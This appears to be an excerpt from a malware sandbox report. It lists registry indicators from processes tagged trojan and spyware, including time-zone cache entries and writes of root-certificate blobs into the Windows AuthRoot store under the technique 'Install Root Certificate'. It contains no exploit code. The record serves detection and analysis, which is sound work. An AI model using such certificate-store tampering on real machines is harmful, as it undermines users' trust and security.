Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-891 = "モロッコ夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-672 = "AUS 東部標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-472 = "エカテリンバーグ標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-334 = "ヨルダン夏時間"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-441 = "アラビア夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-661 = "中央オーストラリア夏時間"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-751 = "トンガ夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-391 = "アラブ夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-211 = "太平洋夏時間"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-462 = "アフガニスタン標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-231 = "ハワイ夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-32 = "中央大西洋標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-1412 = "シリア標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-131 = "米国東部夏時間"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-442 = "アラビア標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-1472 = "マガダン標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-22 = "カーボベルデ標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-502 = "ネパール標準時"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-371 = "エルサレム夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-522 = "中央アジア北標準時"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-212 = "太平洋標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-341 = "エジプト夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-384 = "ナミビア夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-602 = "台北 (標準時)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-214 = "太平洋夏時間 (メキシコ)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-692 = "タスマニア標準時"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-401 = "アラビック夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-511 = "中央アジア夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-152 = "中央アメリカ標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-282 = "中央ヨーロッパ標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-772 = "モンテビデオ標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-722 = "中央太平洋 (標準時)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-491 = "インド夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-752 = "トンガ標準時"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-741 = "ニュージーランド夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-132 = "米国東部標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-571 = "中国 (夏時間)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-792 = "南アメリカ西部標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-1041 = "ウランバートル夏時間"	LzmwAqmV.exe

Modifies system certificate store 2 TTPs 14 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Thu1160e2804caf.exekerclean.exeservices64.exeThu118764660749a3b.exeThu115049bf2e.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Thu1160e2804caf.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu1160e2804caf.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	kerclean.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Thu118764660749a3b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Thu115049bf2e.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	kerclean.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu1160e2804caf.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Thu118764660749a3b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 